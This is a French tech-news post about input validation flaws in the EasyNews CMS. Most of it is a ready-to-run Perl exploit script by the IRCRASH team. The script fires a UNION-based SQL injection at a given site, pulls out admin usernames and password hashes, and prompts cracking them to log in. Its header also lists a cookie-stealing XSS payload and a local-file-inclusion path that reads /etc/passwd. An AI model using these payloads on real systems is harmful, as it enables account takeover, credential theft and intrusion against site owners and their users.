Actualité Informatique et Multimédia

Faille dans EasyNews : Multiple Input Validation Vulnerabilities

(pas de vote)

 Loading ...

EasyNews est menacé par une faille sérieuse permettant de prendre le contrôle totale du CMS

Le CMS EasyNews est vulnérable aux attaques de type SQL-injection, cross-site scripting et d’include de fichier local pouvant permettre la prise de contrôle totale d’EasyNews. En exploitant cette faille, un pirate peut voler le cookie d’authentification et se faire passer pour l’admin du CMS, modifier les données, exécuter des fichiers locaux ou encore retrouver des informations sensibles.

#!/usr/bin/perl
#####################################################################################
####                               EasyNews-40tr                                 ####
####        Multiple Remote Vulnerabilities (SQL Injection Exploit/XSS/LFI)      ####
#####################################################################################
#                                                                                   #
#Discovered by : IRCRASH By Dr.Crash                                                #
#Exploited By : Dr.Crash                                                            #
#IRCRASH Team Members : Dr.Crash - Malc0de - R3d.w0rm                               #
#                                                                                   #
#####################################################################################
#                                                                                   #
#Script Download : http://myiosoft.com/download/EasyNews/easynews-40tr.zip          #
#                                                                                   #
#####################################################################################
#                                   < XSS >                                         #
#XSS Address : http://www.example.com/staticpages/easypublish/index.php?PageSection=0&page=individual&table=edp_pupublish&read=<script>alert(document.cookie);</script>
#                                                                                   #
#####################################################################################
#                                   < SQL >                                         #
#SQL Address : http://www.example.com/dynamicpages/index.php?PageSection=7&page=individual&table=edp_Help_Internal_News&read=1+union+all+select+1,2,3,4,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),6+from+edp_puusers
#                                                                                   #
#####################################################################################
#                                   < LFI >                                         #
#SQL Address : http://www.example.com/admin/login.php?lang=/../../../../../../../../../../../../../../../etc/passwd%00
#                                                                                   #
#####################################################################################
#                         Our site : Http://IRCRASH.COM                             #
#####################################################################################

use LWP;
use HTTP::Request;
use Getopt::Long;

sub header
{
print "
****************************************************
*       EasyNews-40tr Sql Injection exploit        *
****************************************************
*AUTHOR : IRCRASH                                  *
*Discovered by : IRCRASH TEAM BY Dr.Crash          *
*Exploited by : IRCRASH TEAM BY Dr.Crash           *
*Our Site : IRCRASH.COM                            *
****************************************************";
}

sub usage
{
print "
* Usage : perl $0 -url http://Sitename/
****************************************************
";
}

my %parameter = ();
GetOptions(\%parameter, "url=s");

$url = $parameter{"url"};

if(!$url)
{
header();
usage();
exit;
}
if($url !~ /\//){$url = $url."/";}
if($url !~ /http:\/\//){$url = "http://".$url;}
$vul = "/dynamicpages/index.php?PageSection=7&page=individual&table=edp_Help_Internal_News&read=1+union+all+select+1,2,3,4,concat(0x4c6f67696e3a,puUsername,0x3c656e64757365723e,0x0d0a50617373776f72643a,puPassword,0x3c656e64706173733e),6+from+edp_puusers";
sub Exploit()
{
$requestpage = $url.$vul;
print "Requesting Page is ".$url."\n";

my $req  = HTTP::Request->new("POST",$requestpage);
$ua = LWP::UserAgent->new;
$ua->agent( 'Mozilla/5.0 Gecko/20061206 Firefox/1.5.0.9' );
#$req->referer($url);
$req->referer("IRCRASH.COM");
$req->content_type('application/x-www-form-urlencoded');
$req->header("content-length" => $contlen);
$req->content($poststring);

$response = $ua->request($req);
$content = $response->content;
$header = $response->headers_as_string();

#Debug Modus delete # at beginning of next line
#print $content;

@name = split(/Login:/,$content);
$name = @name[1];
@name = split(/<enduser>/,$name);
$name = @name[0];

@password = split(/Password:/,$content);
$password = @password[1];
@password = split(/<endpass>/,$password);
$password = @password[0];

if(!$name && !$password)
{
print "\n\n";
print "!Exploit failed ! :(\n\n";
exit;
}

print "Username: ".$name."\n";
print "Password: " .$password."\n\n";
print "Crack Md5 Password And Login In : $url/admin/\n";
print "Enjoy My friend .....\n";

}

#Starting;
print "
****************************************************
*       EasyNews-40tr Sql Injection exploit        *
****************************************************
*AUTHOR : IRCRASH                                  *
*Discovered by : IRCRASH TEAM BY Dr.Crash          *
*Exploited by : IRCRASH TEAM BY Dr.Crash           *
****************************************************";
print "\n\nExploiting...\n";
Exploit();